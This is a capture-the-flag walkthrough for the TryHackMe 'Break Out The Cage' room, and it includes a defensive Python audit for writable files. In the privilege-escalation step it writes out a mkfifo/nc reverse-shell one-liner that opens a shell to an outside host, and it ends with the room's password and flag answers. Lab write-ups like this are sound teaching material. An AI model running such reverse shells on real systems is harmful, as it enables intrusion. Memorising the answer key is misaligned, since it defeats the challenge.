Room: https://tryhackme.com/room/breakoutthecage1

I'll explain everything in a simple way so even if you're new to hacking, you can follow along and learn.

Friendly Access here!

Step 1: Initial Enumeration

I started with a full port scan using Nmap:

nmap -sS -sV -vv -p- 10.201.69.190

Here's what I found:

(screenshot of the Nmap output)

Step 2: Anonymous FTP Access

I tried connecting to FTP using anonymous login:

ftp 10.201.69.190
Username: Anonymous
Password: Anonymous

It worked, and there was a file called dad_tasks. I downloaded it:

(screenshot of the FTP session)

Step 3: Decoding the Hidden Message

When I opened dad_tasks, it was Base64 encoded. I decoded it:

(screenshot of the Base64 decoding)

But the result still looked like encrypted text. After some googling I found it was a Vigenère cipher and used the dcode.fr Vigenère decoder to crack it.

(screenshot of the dcode.fr result)

Step 4: SSH into Weston's Account

I tried logging in over SSH:

ssh weston@10.201.69.190

Password:

Mydadisghostrideraintthatcoolnocausehesonfirejokes

It worked! I was now in as user weston.

Step 5: Checking Sudo Permissions

I checked what weston could run with sudo. The relevant line of the output was:

(root) /usr/bin/bees

I viewed the script:

cat /usr/bin/bees

Output:

#!/bin/bash
wall "AHHHHHHH THEEEEE BEEEEESSSS!!!!!!!!"

It just broadcasts a message with wall, but I noted that this script runs as root.

Step 6: Privilege Escalation Path

I looked around the home directories:

cd /home
ls -la

I saw a user named cage, so I searched for files owned by cage:

find / -type f -user cage 2>/dev/null

Found:

/opt/.dads_scripts/spread_the_quotes.py
/opt/.dads_scripts/.files/.quotes

I looked at the .quotes file. It was readable and writable by my user, so I overwrote it with a reverse-shell command using echo, since nano isn't installed on the machine:

echo "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.201.97.101 4444 >/tmp/f" > /opt/.dads_scripts/.files/.quotes

Then I started a listener on my machine:

nc -lvnp 4444

Then I waited for the script to be triggered, and I got a shell as cage.
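The weakness in this step is a file that a script runs as another user (cage) reads, while a lower-privileged user (weston) can write to it. As an added example, not code from the writeup or the room, here is a small Python audit that flags files under a directory whose group or other write bits are set, then strips those bits. It builds a constructed copy of the /opt/.dads_scripts layout in a temporary directory with placeholder contents, so it runs anywhere without touching the real paths.

```python
import os
import stat
import tempfile

# Mode bits that let someone other than the owner modify a file.
WRITE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def writable_by_others(path):
    """True if the group or other bits grant write on path."""
    return bool(os.stat(path).st_mode & WRITE_BY_OTHERS)


def audit_tree(root):
    """Return sorted paths (relative to root) of files writable by group/other."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if writable_by_others(full):
                findings.append(os.path.relpath(full, root))
    return sorted(findings)


def tighten(root):
    """Strip group/other write bits from every flagged file; return what was changed."""
    changed = []
    for rel in audit_tree(root):
        full = os.path.join(root, rel)
        mode = stat.S_IMODE(os.stat(full).st_mode)
        os.chmod(full, mode & ~WRITE_BY_OTHERS)
        changed.append(rel)
    return changed


def demo():
    """Constructed layout mirroring the room's /opt/.dads_scripts (placeholder contents,
    not the real files). Returns (findings before tightening, findings after)."""
    root = tempfile.mkdtemp()
    files_dir = os.path.join(root, ".files")
    os.makedirs(files_dir)
    script = os.path.join(root, "spread_the_quotes.py")
    quotes = os.path.join(files_dir, ".quotes")
    with open(script, "w") as fh:
        fh.write("# placeholder for the quote-spreading script\n")
    with open(quotes, "w") as fh:
        fh.write("placeholder quote\n")
    os.chmod(script, 0o755)  # owner-writable only: acceptable
    os.chmod(quotes, 0o666)  # world-writable input read by a privileged job: the weakness
    before = audit_tree(root)
    tighten(root)
    after = audit_tree(root)
    return before, after


if __name__ == "__main__":
    print(demo())
```

The same audit, pointed at a real directory that a cron job or service reads from, is the check a system owner would run: any input file a scheduled script consumes should be writable only by the account that is supposed to maintain it.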

Step 7: User Flag

I checked cage's home directory and found the user flag:

(screenshot of the user flag)

Step 8: Checking Emails

I went into the email backup:

(screenshot of the email backup)

One email said:

The note said: haiinspsyanileph

All emails also had a weird obsession with the word "face". I thought that might be the key for another Vigenère cipher.

I used CyberChef this time with:

  • Cipher text: haiinspsyanileph
  • Key: face

Decrypted message:

cageisnotalegend, which is the root password.

Step 9: Become Root

I switched to root and went to /root/email_backup/ for the root flag. (I had to spawn a TTY with Python first; otherwise the terminal couldn't prompt for the password.)

Found the root flag:

THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3}

Answers, in case you were stuck:

What is Weston's password?

Mydadisghostrideraintthatcoolnocausehesonfirejokes

What's the user flag?

THM{M37AL_0R_P3N_T35T1NG}

What's the root flag?

THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3}
